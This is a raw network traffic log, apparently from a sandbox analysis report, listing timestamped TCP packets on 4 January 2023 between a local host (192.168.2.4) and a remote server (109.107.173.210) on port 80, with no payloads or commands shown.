Jan 4, 2023 16:47:25.513762951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513792992 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513834953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513853073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513880014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513905048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513925076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513940096 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.513969898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.513982058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514014006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514058113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514074087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514101028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514113903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514144897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514168978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514188051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514194012 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514230967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514244080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514276028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514286995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514319897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514333010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514364958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514370918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514408112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514419079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514451981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514473915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514497042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514514923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514540911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514564037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514585018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514597893 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514628887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514641047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514672041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514684916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514736891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514753103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514797926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514816046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514841080 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514849901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514883995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514898062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514945030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.514947891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.514991999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515002966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515041113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515054941 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515089989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515119076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515136957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515144110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515185118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515208960 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515232086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515233994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515280008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515290976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515327930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515374899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515393019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515464067 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515511990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515522003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515527010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515567064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515579939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515614033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515635967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515661955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515670061 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515708923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515722036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515757084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515772104 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515805960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515851974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515852928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515877008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515903950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515907049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515949965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.515959978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.515997887 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.516004086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.516046047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.516052961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.516099930 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.525468111 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525554895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525605917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525654078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525659084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.525705099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525732994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.525758028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525785923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.525813103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525859118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.525860071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525901079 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.525907993 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525938034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.525959015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.525985956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.526005983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.526035070 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.526052952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.526082039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.526103020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.526117086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.526151896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.526170969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.526200056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.526221037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.526247978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.526268959 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.526294947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.526320934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.526343107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.526365995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.526413918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542061090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542104006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542135000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542167902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542198896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542205095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542232037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542263031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542263985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542295933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542311907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542329073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542339087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542361975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542371988 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542391062 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542393923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542412996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542427063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542458057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542479992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542493105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542511940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542538881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.542551994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.542591095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.793535948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829381943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829435110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829483986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829502106 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829531908 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829547882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829547882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829566956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829581976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829612017 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829613924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829659939 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829662085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829698086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829705954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829731941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829742908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829763889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.829776049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.829806089 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.831551075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831609964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831648111 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831655979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.831681013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831711054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.831713915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831747055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831764936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.831779957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831788063 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.831814051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831845999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831850052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.831877947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831886053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.831904888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.831912041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831922054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.831947088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831979036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.831998110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832011938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832025051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832045078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832056046 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832082033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832103968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832115889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832125902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832163095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832163095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832210064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832247019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832254887 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832278967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832287073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832321882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832323074 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832362890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.832374096 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.832413912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.833658934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833705902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833738089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833756924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.833770990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833798885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.833806038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833817005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.833841085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833865881 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.833870888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833892107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.833904982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833914995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.833939075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833950996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.833971977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.833981991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834005117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834014893 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834038973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834049940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834074974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834084034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834112883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834119081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834156990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834160089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834199905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834204912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834233999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834240913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834269047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834279060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834300995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834310055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834333897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834346056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834367037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834377050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834402084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834409952 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834434986 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834445000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834467888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.834479094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.834512949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.835858107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.835895061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.835961103 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.855803967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.855856895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.855922937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.855951071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.855958939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.855982065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856009960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856029987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856039047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856043100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856066942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856067896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856097937 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856123924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856148005 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856153011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856169939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856169939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856184006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856204033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856210947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856239080 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856266975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856278896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856278896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856293917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856295109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856322050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856338024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856348991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856375933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856379986 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856405020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856422901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856431007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.856447935 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856470108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.856492996 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.858289003 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858324051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858349085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858371973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858396053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858409882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.858419895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858433962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.858447075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858457088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.858474970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858496904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.858500004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858525991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858532906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.858551025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858568907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.858577967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858603954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.858604908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.858637094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.858659983 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859040022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859103918 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859106064 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859133005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859157085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859159946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859181881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859189987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859208107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859215021 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:25.859232903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:25.859240055 CET	49695	80	192.168.2.4	109.107.173.210
